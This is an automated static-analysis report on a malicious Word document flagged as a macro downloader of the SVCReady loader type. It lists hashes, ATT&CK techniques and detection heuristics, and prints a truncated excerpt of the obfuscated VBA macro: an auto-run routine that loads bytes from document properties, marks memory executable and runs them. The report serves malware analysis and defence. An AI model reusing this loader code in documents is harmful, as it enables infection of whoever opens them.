Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 997e7608f4a7ad0a…

MALICIOUS

Office (OOXML) / .DOC

Size: 2.21 MB
Created: 2022-08-11 14:50:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2022-08-11
MD5: 399e57a077e7bd2bc87e2579cd235146
SHA-1: 607a6d5bc6797ba94240802dc33f44d946f9dd1f
SHA-256: 997e7608f4a7ad0aa779e8bb7c346e8a61dafacce65116c323125b389c80398c
Risk score: 362

Malware Insights

MITRE ATT&CK
  • T1566.002 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with a renamed VBA project part, indicating an attempt to evade detection. The presence of a Document_Open macro, GetObject, and CallByName calls, along with a VBA property-stored shellcode loader that reads reversed configuration from document properties, strongly suggests a malicious downloader. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', a common lure for macro-based malware.

Heuristics (10)

  • ClamAV detection [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8a5a5aca5aca5a7a-OOXML-9981537-0
  • VBA project inside OOXML [medium, 6 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/DhYFdPRKMn.bin)
  • VBA property-stored shellcode loader [critical] OLE_VBA_PROPERTY_SHELLCODE_LOADER
    VBA auto-exec macro takes the address (VarPtr) of a byte buffer decoded from a document property, marks the memory executable (VirtualProtect/VirtualAlloc), and transfers control through a callback API (e.g. SetTimer/EnumWindows). The payload is hidden in the document properties rather than in the macro source — the SVCReady loader pattern, a native shellcode runner rather than a parser CVE.
  • VBA project part renamed to evade filename detection [high] OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The VBA project contains a Document_Open auto-execute macro.
  • GetObject call [high] OLE_VBA_GETOBJ
    The macro source calls GetObject.
  • CallByName call [high] OLE_VBA_CALLBYNAME
    The macro source calls CallByName.
  • VBA reads reversed config from document properties [high] OLE_VBA_REVERSED_DOCPROP_CONFIG
    VBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | channel: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | channel: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | channel: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | channel: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | channel: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | channel: In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | channel: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | channel: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | channel: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | channel: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | channel: In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | channel: In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 26d9eb318c7ac7dab42d327b6f5b7b1c07e074adffb611fd3102fb2b3588eddb
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 20161 bytes
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function ––——————––——–———––—––——–———— Lib "kernel32" Alias "VirtualProtect" (ByVal —–——––––————–—–— As LongPtr, ByVal —–—–––——––——–———————––——–—–––—– As LongPtr, ByVal ——––––—–——––––—— As LongPtr, ––—–—–—–—–————––——— As LongPtr) As LongPtr
Private Declare PtrSafe Function —––––——–– Lib "user32" Alias "KillTimer" (ByVal ——–—– As LongPtr, ByVal –——–———–——–– As LongPtr) As LongPtr
Private Declare PtrSafe Function —–—–————— Lib "user32" Alias "SetTimer" (ByVal ––—–—–——––————–——––—–— As LongPtr, ByVal –—––– As LongPtr, ByVal ——––———––—–—–— As LongPtr, ByVal –——––—––——––—————–—–—–—– As LongPtr) As LongPtr
Function ——–—–—–––––—–––—–––––—–——–——(—–—––——–——————–––, Optional –—–—–————–——— = False)
    If –—–—–————–——— Then
        Set ––—–—––—–———–—––– = GetObject(—–—––——–——————–––)
    Else
        Set ––—–—––—–———–—––– = ————––—––———–—––(——–––––––—–—————————(), —–—––——–——————–––)
    End If
    Set ——–—–—–––––—–––—–––––—–——–—— = ––—–—––—–———–—–––
End Function
Function ———–——–—–––—––——(—–––——––——––—–, ––—––——–—––—––—————––—–————–)
    ———–——–—–––—––—— = Mid(—–––——––——––—–, ––—––——–—––—––—————––—–————– + 1, 1)
End Function
Function —––—–––––—–––––———–—–—–—––—(—–———–—–———––, Optional ––—––———––——–———–—––— = False)
    If ––—––———––——–———–—––— Then
        –—–——–——–––—–––—–————––— = Len(—–———–—–———––)
    Else
        –—–——–——–––—–––—–————––— = ————––—––———–—––(—–————–—————––(), —–———–—–———––)
    End If
    —––—–––––—–––––———–—–—–—––— = –—–——–——–––—–––—–————––—
End Function
Sub ————––––––———–––——(w)
    Dim —––—–––—–—– As Long
    Dim ––––– As Long
    ––––– = —–—––—–() + (–—–––—–——––—)
    Do
        —––—–––—–—– = —–—––—–()
        DoEvents
    Loop Until —––—–––—–—– > –––––
End Sub
Function –—–—–—()
    –—–—–— = 11
End Function
Function —–––—–———–—–——()
    —–––—–———–—–—— = 2
End Function
Private Sub Document_Open()
    Dim ––—–——–————() As Byte
    If –——––——() Then
        ––—–——–———— = –––—–(–—–—(Tmesca4R6S("zIrZFvu9")).Value)
    Else
        ––—–——–———— = –––—–(–—–—(Tmesca4R6S("sggONjSJ7")).Value)
    End If
    Dim —––———––—––—––—–—–—– As LongPtr
    Dim ——––—–—–—–——–—–—————–—– As LongPtr
    Dim –— As LongPtr
    Dim —–––––––––––––––––––––——––——––— As LongPtr
    ——––—–—–—–——–—–—————–—– = ——–––—–——–––––—––––————––—(––—–——–————) + 1
    –— = VarPtr(––—–——–————(0))
    ––——————––——–———––—––——–———— –—, ——––—–—–—–——–—–—————–—–, 64, VarPtr(—––———––—––—––—–—–—–)
    ––—–––——––———–––—–—–—–——–—()(Tmesca4R6S("pokkwYZ_Z")) = Tmesca4R6S("skAI7pCo1PO")
    —–––––––––––––––––––––——––——––— = —–—–—————(0, –—, 1, –—)
    ————––––––———–––—— 1
    —––––——–– 0, —–––––––––––––––––––––——––——––—
    ––—–––——––———–––—–—–—–——–—().Remove (Tmesca4R6S("CYMWW3d2l"))
    ––—–––——––———–––—–—–—–——–—().Remove (Tmesca4R6S("zKrvnK5tEv"))
    ReDim ––—–——–————(1)
End Sub
Function ––—–———–()
    ––—–———– = 8
End Function
Function –——––——()
    #If Win64 Then
        –——––—— = True
    #Else
        –——––—— = False
    #End If
End Function
Function —–————–—————––()
    —–————–—————–– = 6
End Function
Function ——–––––––—–—————————()
    ——–––––––—–————————— = 4
End Function
Function —––———–——–—––—––—(——–———––, —–——–—–——––—–——–————–, Optional ––—–———––—––—–——–––——–—–——–– = False)
    If ––—–———––—––—–——–––——–—–——–– Then
        –– = Mid(——–———––, —–——–—–——––—–——–————– + 1, 1)
    Else
        –– = ————––—––———–—––(–—–––——–———–———––—–—–––—––(), ——–———––, —–——–—–——––—–——–————–)
    End If
    —––———–——–—––—––— = ––
    End 
... (truncated)
Filename: vbaProject_00.bin
SHA-256: bc858bacd44938933d8b5d0f48372c0e4cfcb293c8a0d0936bf2d1458510f8f0
Kind: vba-project
Source: OOXML VBA project: word/DhYFdPRKMn.bin
Size: 14848 bytes